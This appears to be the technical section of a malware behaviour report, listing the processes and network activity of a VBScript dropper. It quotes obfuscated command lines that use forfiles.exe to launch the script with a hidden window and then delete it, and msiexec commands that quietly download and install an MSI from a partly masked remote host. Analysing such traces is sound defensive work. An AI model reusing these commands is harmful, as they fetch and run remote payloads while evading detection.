Technical Information
- '<SYSTEM32>\wscript.exe' <Current directory>\summary.vbs
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Current directory>\summary.vbs&del "<Current directory>\summary.vbs"
- <Current directory>\summary.vbs
- <Current directory>\summary.vbs
- http://kr###gate.com/test/1.msi
- DNS ASK kr###gate.com
- '<SYSTEM32>\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /c ws^c^r^ipt^.exe <Current directory>\summary.vbs&del "<Current directory>\summary.vbs"' (with hidden window)
- '<SYSTEM32>\cmd.exe' ws^c^r^ipt^.exe <Current directory>\summary.vbs&del <Current directory>\summary.vbs
- '<SYSTEM32>\cmd.exe' /c msiexec/q/ihttp://kr###gate.com/test/1.msi
- '<SYSTEM32>\msiexec.exe' /q/ihttp://kr###gate.com/test/1.msi